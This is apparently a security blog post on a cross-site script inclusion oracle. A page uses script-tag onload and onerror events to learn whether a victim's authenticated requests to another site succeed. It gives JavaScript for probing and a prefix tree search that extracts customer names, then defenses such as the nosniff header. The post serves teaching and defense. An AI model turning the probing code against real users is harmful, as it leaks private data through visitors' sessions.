I haven’t seen this specific attack published anywhere, so I’m going to attempt to make this post as comprehensive as possible. Edit: domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called “XSSI”. My blog post presents some new ideas about the attack, but referring to it as “new” is a bit bold and isn’t quite appropriate.
I’ve also structured this paper for easy reference. The structure is as follows:
- The Attack
- Attack Requirements
- The Defense
- Further Study
- In Summary
TLDR Attack: Read “A More Interesting Example” in the Attack section below for a walkthrough.
TLDR Defense: Use the nosniff HTTP header (“Requirement 1” explained in the Defense section below).
I won’t explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I’m presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating.
1.) The Attack
The basic idea is very similar to an XSSI login oracle. An attacker attempts to load script tags on his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1).
So what’s the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint, but potentially a lot. After all, the HTTP status code is meant to return information, and often does for APIs.
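The mechanism above can be sketched in a few lines of JavaScript. This is only an illustration under stated assumptions: the function name `probe`, the callback shape, and the `doc` parameter (which defaults to the browser's `document` and exists only so the function can be exercised outside a browser) are mine, not part of any published tooling.

```javascript
// Sketch: load `url` in a script tag and report which handler fired.
// onResult(true)  -> onload ran (per the behavior described above, a 2XX)
// onResult(false) -> onerror ran (a non-2XX, or the load was blocked)
// `doc` is an assumption for testability; in a browser it is `document`.
function probe(url, onResult, doc = globalThis.document) {
  const script = doc.createElement('script');
  script.onload = () => {
    script.remove(); // clean up so repeated probes don't pile up in the DOM
    onResult(true);
  };
  script.onerror = () => {
    script.remove();
    onResult(false);
  };
  script.src = url;
  doc.head.appendChild(script); // appending the element triggers the GET
}
```

If the response body is not valid JavaScript, the browser may additionally report a script error through window.onerror; the sketch ignores that signal and only looks at onload versus onerror.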
Some Basic Examples
A More Interesting Example
Let’s walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to “/search?c=d*”, where the “*” character is acting as a wildcard, will return all the customers that start with the letter “d” and a 200 status code. If no customers match the “d*” pattern, then a 500 is returned. An attacker wants this information, but can’t log in and just look. So instead he asks an already logged-in user to make requests on the attacker’s behalf and tell the onload function “yes, I found someone” or tell the onerror function “no, that search returned nothing”.
It’s similar to exploiting a blind SQL injection, except it’s through a third party and you’re abusing the Same-Origin Policy instead of syntax. Notice that the attack does not depend on the content type the ticketing system returns. The search can return JSON, XML, HTML or even an image; it’s all the same to this attack as long as the nosniff header isn’t being returned (Requirement 1 in the Defense section). URL parameters can be included in the script src attribute, so an attacker can create a script whose src points at “/search?c=a*” on the ticketing system, with onload and onerror handlers attached.
Any visitor to the attacker’s site will then automatically send a GET request to the ticketing system, cross-origin. If there’s a customer that starts with “a”, then the endpoint will return a 200 and the onload will execute. The attacker’s onload handler would then load another script into the DOM asking if there are any customers that start with “aa”. If the onerror event occurs, it’s because there were no customers that started with the letter “a”, so the attacker would then load another script into the DOM checking for customers who start with the letter “b”. The script would continue with a tree searching algorithm until a valid customer name was returned.
Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information, for example an endpoint that searches for email addresses associated with a customer. The attacker could also search for customers matching the “*” pattern. If this fails, it means the visitor doesn’t have access to the ticketing system customer search and no further requests need to be made. Because the information-stealing requests are being performed by visitors to the attacker’s site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage, even from an internal ticketing system.
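A minimal sketch of such a script, built from JavaScript rather than written as static HTML. The host `https://ticketing.example` and the helper names `buildProbeUrl` and `createProbeScript` are hypothetical; only the “/search?c=” path and the “*” wildcard come from the example above.

```javascript
// Build the search URL for a given prefix. The prefix is URL-encoded and
// the "*" wildcard is appended literally, e.g. "a" -> ".../search?c=a*".
function buildProbeUrl(base, prefix) {
  return base + '/search?c=' + encodeURIComponent(prefix) + '*';
}

// Create (but do not yet attach) a script element aimed at that URL.
// onHit runs from onload ("yes, I found someone"); onMiss runs from
// onerror ("no, that search returned nothing").
function createProbeScript(doc, url, onHit, onMiss) {
  const script = doc.createElement('script');
  script.src = url;
  script.onload = onHit;
  script.onerror = onMiss;
  return script;
}
```

In a browser, the attacker’s page would append the returned element to `document.head`, at which point the visitor’s browser sends the GET request with whatever cookies it holds for the ticketing system.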
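The search described above can be sketched as a depth-first walk over prefixes. This is one possible reading of the “tree searching algorithm”, not the author’s code. The names `findFirstName` and `probeFn` are hypothetical, and the sketch assumes that every customer name uses only characters from `alphabet`, so a prefix that matches but cannot be extended is treated as a complete name.

```javascript
// probeFn(prefix, cb) must call cb(true) when "prefix*" matches at least
// one customer (onload fired) and cb(false) otherwise (onerror fired).
// done(name) receives the first full name found, or null if none matched.
function findFirstName(probeFn, alphabet, done, prefix = '', maxLen = 32) {
  let i = 0;
  function tryNext() {
    if (i >= alphabet.length || prefix.length >= maxLen) {
      // No longer prefix matched: the current prefix is the whole name
      // (or nothing matched at all if we never got past the empty prefix).
      done(prefix === '' ? null : prefix);
      return;
    }
    const candidate = prefix + alphabet[i++];
    probeFn(candidate, (hit) => {
      if (hit) {
        // A customer starts with `candidate`; descend one level.
        findFirstName(probeFn, alphabet, done, candidate, maxLen);
      } else {
        // Nobody starts with `candidate`; try the next letter.
        tryNext();
      }
    });
  }
  tryNext();
}
```

In a browser, `probeFn` would load a script tag for the search URL and report which of onload or onerror fired. Each level costs at most one request per letter of the alphabet, so the number of requests grows with name length times alphabet size rather than with the number of possible names.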
2.) Attack Requirements
To put it simply, the following elements are required:
- The endpoint must respond to a GET request.
3.) The Defense
You just have to disturb one of the above requirements. Let’s go through the requirements in greater detail from a defensive perspective.
If the ‘X-Content-Type-Options: nosniff’ HTTP header is returned, this attack won’t work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser “When I say I am giving you <Content-Type> I mean it is really <Content-Type>!”.
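As an illustration of the server side, here is a minimal sketch for a Node.js-style response object. The helper name `sendJson` is hypothetical, and the sketch assumes only that the response object offers `statusCode`, `setHeader`, and `end`, as Node’s `http.ServerResponse` does.

```javascript
// Send a JSON body with an explicit content type and the nosniff header.
// With both in place, a browser that honors nosniff should refuse to
// treat this response as a script when it is loaded via a script tag.
function sendJson(res, status, body) {
  res.statusCode = status;
  res.setHeader('Content-Type', 'application/json');
  res.setHeader('X-Content-Type-Options', 'nosniff');
  res.end(JSON.stringify(body));
}
```

The header needs to be present on every response from the endpoint, including error responses, so in practice it is usually set once in shared middleware or web server configuration rather than per handler.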
Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed. I don’t know when support started, but I have found that Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven’t personally tested either of them. Edit: 1lastBr3ath from Reddit pointed out that Safari doesn’t support the nosniff header, while Edge does. He also corrected my mistake: it is Firefox 51, not 50, that added support for nosniff.
Note2: On the topic of which content types are affected, 1lastBr3ath from Reddit pointed me to this documentation, which is really where I should’ve pointed to.
So not all content types will work in script tags. However, typical informational content types, like XML or JSON, will. This restriction can potentially be bypassed by just using a different tag (see Further Study: other tags).
Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can’t be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same.
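One way to avoid relying on the framework’s defaults is to check the method explicitly. A minimal sketch, assuming Node.js-style `req` and `res` objects; the helper name `requirePost` is hypothetical.

```javascript
// Return true if the request is a POST. Otherwise answer 405 and return
// false so the caller can stop. Every GET then gets the same status code,
// which leaves a script-tag probe with nothing to distinguish.
function requirePost(req, res) {
  if (req.method === 'POST') {
    return true;
  }
  res.statusCode = 405;
  res.setHeader('Allow', 'POST');
  res.end();
  return false;
}
```

A handler would call `if (!requirePost(req, res)) return;` before touching any data, so a GET never reaches the search logic.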
If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don’t just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead.
If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information.
4.) Further Study
I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too.
I believe img tags pointing cross-origin behave similarly to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look.
I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS, then there are bigger problems than this attack.
I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request.
5.) In Summary
Any detectable difference in loading a cross-origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though that is unlikely).
Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily.
Attackers: Same origin policy is a little understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross origin via script tags.